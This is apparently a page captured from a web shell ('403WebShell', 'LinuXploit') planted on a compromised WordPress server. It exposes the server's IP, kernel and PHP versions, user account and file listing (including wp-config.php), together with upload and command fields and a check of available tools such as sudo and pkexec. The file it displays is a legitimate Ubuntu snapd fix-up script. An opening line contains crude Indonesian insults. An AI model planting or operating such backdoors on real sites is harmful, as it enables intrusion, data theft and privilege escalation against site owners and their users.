buyer kontol nego ga ngotak comecondo.com
 Linux Sandbox-A 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
 Apache/2.4.18 (Ubuntu)
 68.183.124.220
 Cant read /etc/named.conf
Name Type Size Owner/Group Permission Last Modified Actions
. dir - gavin/www-data drwxr-sr-x 2024-12-15 11:41:30
.. dir - root/root drwxr-xr-x 2019-08-25 02:29:45
.sucuriquarantine dir - root/www-data drwxr-sr-x 2024-05-24 05:31:33
home dir - gavin/www-data drwxrwsr-x 2026-05-23 05:31:31
worksheets dir - gavin/www-data drwxrwsr-x 2026-05-23 05:31:31
wp-admin dir - gavin/www-data drwxr-sr-x 2025-08-29 03:10:31
wp-content dir - gavin/www-data drwxrwsr-x 2026-05-23 05:31:31
wp-includes dir - gavin/www-data drwxr-sr-x 2021-06-27 11:01:30
.htaccess text/plain 201 B root/www-data -rw-r--r-- 2021-06-24 04:05:20
agent-contact-1.JPG image/jpeg 22.78 KB gavin/www-data -rw-rw-r-- 2022-01-31 05:13:10
circle-16.png image/png 268 B gavin/www-data -rw-rw-r-- 2021-01-11 04:23:00
index.html text/html 11.06 KB gavin/www-data -rw-r--r-- 2019-08-25 02:29:47
index.php text/x-php 420 B gavin/www-data -rw-r--r-- 2017-11-30 11:11:00
license.txt text/plain 19.47 KB gavin/www-data -rw-r--r-- 2019-01-01 08:37:49
map.php text/html 1012 B gavin/www-data -rw-rw-r-- 2021-01-01 03:50:38
pin-8-16.png image/png 309 B gavin/www-data -rw-rw-r-- 2021-01-11 04:38:33
pin-8-24.png image/png 499 B gavin/www-data -rw-rw-r-- 2021-01-11 04:40:01
pin-blue-1.png image/png 28.16 KB gavin/www-data -rw-rw-r-- 2022-01-27 09:10:36
pin-green-1.png image/png 12.71 KB gavin/www-data -rw-rw-r-- 2022-01-27 09:23:52
pin-house-red-2.png image/png 1.36 KB gavin/www-data -rw-rw-r-- 2022-01-30 09:18:10
pin-house-red-3.png image/png 2.49 KB gavin/www-data -rw-rw-r-- 2022-01-30 09:20:50
readme.html text/html 7.27 KB gavin/www-data -rw-r--r-- 2019-04-08 10:59:56
wallpaper1.jpg image/jpeg 58.99 KB gavin/www-data -rw-rw-r-- 2022-01-29 05:15:06
wallpaper2.jpg image/jpeg 788.8 KB gavin/www-data -rw-rw-r-- 2022-02-01 11:27:14
wp-activate.php text/x-php 6.76 KB gavin/www-data -rw-r--r-- 2019-01-12 06:41:52
wp-blog-header.php text/x-php 369 B gavin/www-data -rw-r--r-- 2017-11-30 11:11:00
wp-comments-post.php text/x-php 2.23 KB gavin/www-data -rw-r--r-- 2019-01-21 01:34:51
wp-config-sample.php text/x-php 2.83 KB gavin/www-data -rw-r--r-- 2020-10-24 04:07:41
wp-config.php text/x-php 3.62 KB gavin/www-data -rw-r--r-- 2022-04-20 01:23:49
wp-cron.php text/x-php 3.76 KB gavin/www-data -rw-r--r-- 2019-01-09 08:37:51
wp-links-opml.php text/x-php 2.44 KB gavin/www-data -rw-r--r-- 2019-01-16 05:29:49
wp-load.php text/x-php 3.23 KB gavin/www-data -rw-r--r-- 2017-11-30 11:11:00
wp-login.php text/x-php 38.62 KB gavin/www-data -rw-r--r-- 2019-06-10 01:34:45
wp-mail.php text/x-php 8.21 KB gavin/www-data -rw-r--r-- 2017-11-30 11:11:00
wp-settings.php text/x-php 18.52 KB gavin/www-data -rw-r--r-- 2019-03-28 07:04:51
wp-signup.php text/x-php 30.36 KB gavin/www-data -rw-r--r-- 2019-01-16 04:51:52
wp-trackback.php text/x-php 4.65 KB gavin/www-data -rw-r--r-- 2017-11-30 11:11:00
xmlrpc.php text/x-php 3 KB gavin/www-data -rw-r--r-- 2018-08-17 01:51:36
© BlackDragon
403WebShell
403Webshell
Server IP : 68.183.124.220  /  Your IP : 216.73.216.228
Web Server : Apache/2.4.18 (Ubuntu)
System : Linux Sandbox-A 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
User : gavin ( 1000)
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/lib/snapd/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/lib/snapd/snapd.core-fixup.sh
#!/bin/sh

set -e

if ! grep -q "ID=ubuntu-core" /etc/os-release; then
    # this code is only relevant on ubuntu-core devices
    #
    # this script will only run via systemd if /writable/system-data
    # exists however we still add this check here in case people run
    # it manually
    exit 0
fi

# No fix-ups yet on UC20
if grep -q snapd_recovery_mode= /proc/cmdline; then
    exit 0
fi

# Workaround https://forum.snapcraft.io/t/5253
#
# We see sometimes corrupted uboot.env files created by fsck.vfat.
# On the fat filesystem they are indistinguishable because one
# has a fat16 name UBOOT.ENV (and not lfn (long-file-name)) but
# the other has a "uboot.env" lfn name and a FSCK0000.000 FAT16
# name. The only known workaround is to remove all dupes and put
# one file back in place.
if [ "$(find /boot/uboot -name uboot.env | wc -l)" -gt 1 ]; then
    echo "Corrupted uboot.env file detected"
    # Ensure we have one uboot.env to go back to. Note that it does
    # not matter which one we pick (we can't choose anyway, we get
    # whatever the kernel gives us). The key part is that there is
    # only a single one after this script finishes. The bootloader
    # logic will recover in any case.
    cp -a /boot/uboot/uboot.env /boot/uboot/uboot.env.save
    # now delete all dupes
    while ls /boot/uboot/uboot.env 2>/dev/null; do
        rm -f /boot/uboot/uboot.env
    done
    # and move the saved one into place
    mv /boot/uboot/uboot.env.save /boot/uboot/uboot.env

    # ensure we sync the fs
    sync
fi


# The code below deals with incorrect permissions that happened on
# some buggy ubuntu-image versions.
#
# This needs to run only once so we can exit here.
if [ -f /var/lib/snapd/device/ownership-change.after ]; then
    exit 0
fi

# store important data in case we need it later
if [ ! -f /var/lib/snapd/device/ownership-change.before ]; then
    mkdir -p /var/lib/snapd/device
    find /etc/cloud /var/lib/cloud /var/lib/snapd -printf '%M %U %G %p\n' > /var/lib/snapd/device/ownership-change.before.tmp || true
    find  /writable/system-data /writable/system-data/var /writable/system-data/var/lib /writable/system-data/boot /writable/system-data/etc -maxdepth 0 -printf '%M %U %G %p\n' >> /var/lib/snapd/device/ownership-change.before.tmp || true
    mv /var/lib/snapd/device/ownership-change.before.tmp /var/lib/snapd/device/ownership-change.before
fi
    
# cleanup read/write files and directories (CVE-2017-10600)
for i in /etc/cloud /var/lib/cloud /var/lib/snapd ; do
  # restore ownership to root:root
  find "$i" \( -type f -o -type d -o -type l \) -a \( \! -uid 0 -o \! -gid 0 \) -print0 | \
    xargs -0 --no-run-if-empty chown -c --no-dereference root:root -- || true
done

# cleanup a few /writable directories without descending
for i in /writable/system-data /writable/system-data/var /writable/system-data/var/lib /writable/system-data/boot /writable/system-data/etc ; do
  # restore ownership to root:root
  find "$i" -maxdepth 0 \( \! -uid 0 -o \! -gid 0 -o -type l \) -print0 | \
    xargs -0 --no-run-if-empty chown -c --no-dereference root:root -- || true
done

# store permissions after manipulation, this is also used as the stamp file
# for the systemd service to ensure it is only run once
find /etc/cloud /var/lib/cloud /var/lib/snapd -printf '%M %U %G %p\n' > /var/lib/snapd/device/ownership-change.after.tmp
# Note: this find will fail on UC20 seeding because there is no
# /writable/system-data/boot
find  /writable/system-data /writable/system-data/var /writable/system-data/var/lib /writable/system-data/boot /writable/system-data/etc -maxdepth 0 -printf '%M %U %G %p\n' >> /var/lib/snapd/device/ownership-change.after.tmp
mv /var/lib/snapd/device/ownership-change.after.tmp /var/lib/snapd/device/ownership-change.after

# ensure things are really on disk
sync

Youez - 2016 - github.com/yon3zu
LinuXploit